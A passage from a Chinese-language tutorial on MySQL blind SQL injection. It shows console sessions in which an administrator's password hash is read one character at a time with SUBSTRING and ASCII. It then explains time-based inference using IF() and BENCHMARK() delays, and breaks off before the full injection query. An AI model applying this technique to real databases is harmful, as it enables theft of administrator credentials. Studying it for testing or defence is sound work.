MySQL数据库盲注技术

核心提示： 17 rows in set (0.00 sec)|---| 你看到的当前用户是普通用户|---| （不会作为root运行）mysql> SELECT USER();+---+| USER() |+---+| 123@localhost |+---+1 row in set (0.0

17 rows in set (0.00 sec)

|---| 你看到的当前用户是普通用户|---| （不会作为root运行）

mysql> SELECT USER();
+---------------+
| USER() |
+---------------+
| 123@localhost |
+---------------+
1 row in set (0.00 sec)
mysql> SELECT password,USER() FROM mysql.user;
ERROR 1142: select command denied to user: '123@localhost' for table 'user'
mysql>

|---| 下面的查询将显示管理员的散列的第一个字节|---|

mysql> SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;

+------------------------------+

| SUBSTRING(user_password,1,1) |

+------------------------------+

| 5 |

+------------------------------+

1 row in set (0.00 sec)

|---| 下面显示管理员散列ASCII的第一个字节|---|

mysql> SELECT ASCII('5');

+------------+

| ASCII('5') |

+------------+

| 53 |

+------------+

1 row in set (0.00 sec)

区别

目标是找到一种以某种方式建议的方法，以至我们寻找的内容是正确的。怎么可能知道管理员散列的第一个

字节是否等于'5'?在NGSS资料里，假如内容与注射的匹配，作者将简单的使查询延迟。在mssql里这个会用一个条件

IF [QUERY] waitfor [TIME]来追加，而mysql不支持'waitfor'。

在下面查询中我成功的用IF()函数跟随一个BENCHMARK()函数来创建5秒钟的延迟。当前用户可以用低权限